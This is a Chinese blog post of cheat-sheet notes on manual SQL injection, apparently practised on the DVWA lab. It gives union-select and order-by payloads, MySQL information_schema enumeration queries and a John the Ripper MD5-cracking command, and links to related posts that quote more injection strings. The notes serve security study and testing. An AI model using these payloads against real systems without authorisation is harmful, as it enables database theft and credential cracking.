手动漏洞挖掘——SQL注入

已于 2022-02-16 21:26:06 修改
阅读量2.2k 收藏
点赞数
分类专栏: 网络渗透 文章标签: 渗透测试 sql
于 2022-02-16 21:16:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60637088/article/details/122849752
版权

目录

基于报错的检测方法

基于布尔的检测

表列数/显示信息位于哪一列

联合查询

mysql的一些函数

密码破解

基于报错的检测方法

基于布尔的检测

'
"
%

表列数/显示信息位于哪一列

(记得添加注释符--)

order by 1/2/3... --

联合查询

' union select 1,2-- 判断select的两个变量先后顺序

' union all select database(),2 --

mysql的一些函数

database()
substring_index(USER(),"@",1)
user()
version()
@@datadir
@@hostname
@@VERSION
@@version_compile_os
dtabase()
char()
CONCAT_WS(CHAR(32,58,32),user(),database(),version()) #连接字符串
md5() #计算哈希值
information_schema #MySQL数据结构

密码破解

john --format=raw-MD5 dvwa.txt --show

MySQL查询数据核心语法

select schema_name from information_schema.schemata #查库

select table_name from information_schema.tables where table_schema=库名 #查表

select column_name from information_schema.columns where table_name=表名 #查列

select 列名 from 库名.表名 #查数据

m0_60637088
关注
专栏目录
漏洞挖掘】——83、API接口安全问题刨析
Fly_鹏程万里
06-12 154
在HW期间的目标信息收集阶段,我们时而会遇到WSDL(Web Services Description Language)的XML格式文件,其定义了Web服务的接口、操作、消息格式和协议细节,在WSDL文件中很多时候都会指定服务的端口类型(Port Type)和绑定(Binding),绑定定义了如何使用 SOAP协议进行通信以及消息的格式和传输细节,而这很多时候会被对此不是很了解的红队队员会直接进行忽略,而部分对此有了解红队的会对接口进行Fuzzingc测试,试图找寻诸如命令执行、SQL诸如等漏洞,力争获取
墨者学院-SQL注入漏洞测试(报错盲注)
weixin_42939822的博客
03-30 5213
墨者学院-SQL注入漏洞测试(报错盲注)
手动漏洞挖掘-SQL注入小谈
含笑
04-25 7723
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 服务器端程序将用户输入参数做为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器。 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数
挖漏洞之SQL注入
weixin_49349476的博客
12-03 503
接受挖sql注入的方法,还有一些绕过方法
漏洞挖掘 | SQL注入实战
最新发布
2301_80115097的博客
08-13 816
我们都知道sql注入的传参有些是明文的,有些是经过编码或者加密的,所以我们搜索的时候不要仅限于inurl:.php?id=1,可以额外的尝试搜搜1的base64编码值MQ==,即可以搜索inurl:.php?id=MQ==,或者搜索1的md5加密值,即可以搜索inrul:.php?id=a0b923820dcc509a。这样子搜索完,我们可测试的范围就扩大了。此处我就是利用inurl:.php?id=MQ==搜索到了一处存在sql注入的网站。
SQL注入漏洞手工挖掘大全(保姆级干货教学)
qq_34780861的博客
03-27 1797
mysql 5.0以下为低版本,5.0以上为高版本(有information_schema数据库)这个数据库是存储所有数据库名,表名,列名,相当于可以通过查询这个数据库获取指定数据库下面的表名列名信息。
手动漏洞挖掘(DVWA)SQL注入
weixin_30337251的博客
07-09 184
SQL注入的原因是因为服务器没有对 客户端数据进行判断,并且前端的数据是攻击者可以控制,攻击者就可以构造不同的语句对数据库进行任意操作 寻找SQL注入点方式: 1.查看是否报错,从而判断是否对输入的SQL语句进行筛查 还是基于DVWA,我们输入'1'的时候: 提示我们输入错误,这里显示'1'''说明页面在接受我们输入的时候,是将我们的数据放置...
记一次SQL注入
weixin_50607688的博客
07-04 340
由于传参是需要进行base64编码的,所以在使用sqlmap的时候需要用到tamper脚本中的base64encode.py脚本,只需要在常规的语句中机上—tamper base64encode.py即可。我们都知道sql注入的传参有些是明文的,有些是经过编码或者加密的,所以我们搜索的时候不要仅限于inurl:.php?id=1,可以额外的尝试搜搜1的base64编码值MQ==,即可以搜索。id=MQ==搜索到了一处存在sql注入的网站。(7)获取其中admin表的字段值。(8)获取对应的值。
sql注入详解
m0_73109590的博客
08-03 1041
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。...
漏洞挖掘SQL注入漏洞挖掘
2301_76694151的博客
04-14 359
输入1' and ascii(substr(database(),1,1))
手动Sql注入
cai_jshsghjs的博客
03-08 1978
id=-1’ union select 1,2,database() --+)​ concat_ws(1,2,3):将参数2和参数3 使用参数1连接起来 参数1:‘-’ 参数2:执行查询语句 参数3:floor(rand(0)*2)闭合单引号, 使用‘ 号时,发现报错,当使用id=1’ or '时正确, id=1’ and (select database()=‘users’) or。使用括号绕过空格,select(user())from dual where(1=1)and(2=2)
SQL手动注入
weixin_43056654的博客
02-25 269
SQL注入定义 - 指web应用程序对用户输入的数据的合法性没有做判断,前端输入后端的参数 是 攻击者可控制的,并且参数代入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作 SQL注入条件 - 参数用户可控 - 参数带入数据库查询,传入的参数拼接到SQL语句,并且带入数据库查询 注入分类 - 注入位置数据类型不同 - 1、字符串注入 -...
sql手动注入
haodawei123的博客
01-16 833
第一步:判断环境,寻找注入点 确定注入点:用’报错就有注入的希望 and 1=1 正常 and 1=2 报错就基本能注入 第二步:猜解表名 检测是否存在admin表,正确存在,返回错误则不存在 And exists (select * from admin) 第三步:猜解字段 Order by字段长度 猜解数据库存在多少数据表 如45正确,46错误,则有45个表 And 1=2 union s...
[ 漏洞挖掘基础篇四 ] 漏洞挖掘SQL 注入挖掘
qq_51577576的博客
06-01 3875
sql 注入挖掘
SQL 手工注入
热门推荐
枫梓林のBlog
04-25 1万+
SQL 手工注入 文章目录SQL 手工注入0x01 SQL注入概述0x02 SQL 注入原理1.基本概述2.单引号的作用3.SQL 注入流程4.SQL 注入的基本分类3.常见注入方式分类0x03 部署 sqli-labs 学习环境1.sqli-labs 简介2.部署sqli-labs 实验环境2.1 搭建LAMP 环境2.2 检查安装的状态和启动服务2.3 配置 mysq 数据库 root 用户密码2.4 安装 sqli-labs 教学环境2.5 创建快照0x04 安装 hackbar 插件0x05 SQL
sql手工注入
admin的博客
10-27 879
按照数据提交的方式来分类 友情链接:https://www.cnblogs.com/-chenxs/p/11614129.html、https://www.cnblogs.com/p0pl4r/p/10320631.html (1)GET 注入 提交数据的方式是 GET , 注入点的位置在 GET 参数部分。比如有这样的一个链接http://xxx.com/news.php?id=1 , id 是注入点。 (2)POST 注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。
手动探索:Web安全测试实战——SQL注入、XSS与文件上传漏洞防范
本文将深入探讨"web安全——手动测试"这一主题,主要关注以下几个关键点: 1. **安全测试与传统测试的区别**: - 目标不同:传统测试侧重于发现软件的功能缺陷(bug),而安全测试更关注识别和评估潜在的安全威胁...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值